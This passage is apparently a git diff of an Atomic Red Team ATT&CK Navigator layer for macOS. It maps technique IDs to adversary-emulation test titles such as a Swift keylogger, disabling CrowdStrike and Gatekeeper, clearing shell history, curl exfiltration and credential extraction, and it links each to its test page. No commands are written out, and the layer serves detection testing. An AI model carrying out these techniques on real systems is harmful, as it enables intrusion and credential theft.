Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.003","score":2,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1056","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- MacOS Swift Keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- AppleScript - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"comment":"\n- AppleScript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":2,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":1,"enabled":true,"comment":"\n- rm -rf\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":6,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":2,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":1,"enabled":true,"comment":"\n- Create local account with admin privileges - MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":5,"enabled":true,"comment":"\n- System Information Discovery\n- List OS Information\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Show System Integrity Protection status (MacOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":5,"enabled":true,"comment":"\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Enumerate users and groups\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":2,"enabled":true,"comment":"\n- Connection Proxy\n- Connection Proxy for macOS UI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":7,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Screencapture\n- Screencapture (silent)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Execute commands from clipboard\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1123","score":1,"enabled":true,"comment":"\n- using Quicktime Player\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a user account on a MacOS system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":4,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine password policy - macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":3,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on macOS\n- List Google Chrome Bookmark JSON Files on macOS\n- List Safari Bookmarks on MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (MacOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Safari Browser Version\n"},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (macOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"comment":"\n- Launch Agent\n- Event Monitor Daemon Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"comment":"\n- Launch Daemon\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":2,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"comment":"\n- Persistance with Event Monitor - emond\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":2,"enabled":true,"comment":"\n- MacOS - Load Kernel Module via kextload and kmutil\n- MacOS - Load Kernel Module via KextManagerLoadKextWithURL()\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"comment":"\n- Copy in loginwindow.plist for Re-Opened Applications\n- Re-Opened Applications using LoginHook\n- Append to existing loginwindow for Re-Opened Applications\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Add macOS LoginItem using Applescript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":3,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Extract Browser and System credentials with LaZagne\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":3,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"comment":"\n- Gatekeeper Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":1,"enabled":true,"comment":"\n- Install root CA on macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"comment":"\n- Keychain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":2,"enabled":true,"comment":"\n- Search macOS Safari Cookies\n- Simulating Access to Chrome Login Data - MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":5,"enabled":true,"comment":"\n- Disable Carbon Black Response\n- Disable LittleSnitch\n- Disable OpenDNS Umbrella\n- Disable macOS Gatekeeper\n- Stop and unload Crowdstrike Falcon on macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n- Mac Hidden file\n- Hidden files\n- Hide a Directory\n- Show all hidden files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":2,"enabled":true,"comment":"\n- Create Hidden User using UniqueID < 500\n- Create Hidden User using IsHidden option\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"comment":"\n- Launchctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":1,"enabled":true,"comment":"\n- Dylib Injection via DYLD_INSERT_LIBRARIES\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"comment":"\n- Plist Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (macOS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1016","score":2,"enabled":true,"comment":"\n- System Network Configuration Discovery\n- List macOS Firewall Rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":2,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX\n- Binary packed by UPX, with modified headers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"comment":"\n- Space After Filename (Manual)\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"comment":"\n- Logon Scripts - Mac\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":1,"enabled":true,"comment":"\n- rc.common\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"comment":"\n- Add file to Local Library StartupItems\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":3,"enabled":true,"comment":"\n- Packet Capture macOS using tcpdump or tshark\n- Packet Capture macOS using /dev/bpfN with sudo\n- Filtered Packet Capture macOS using /dev/bpfN with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":1,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.003","score":2,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1056","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- MacOS Swift Keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- AppleScript - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"comment":"\n- AppleScript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":2,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View 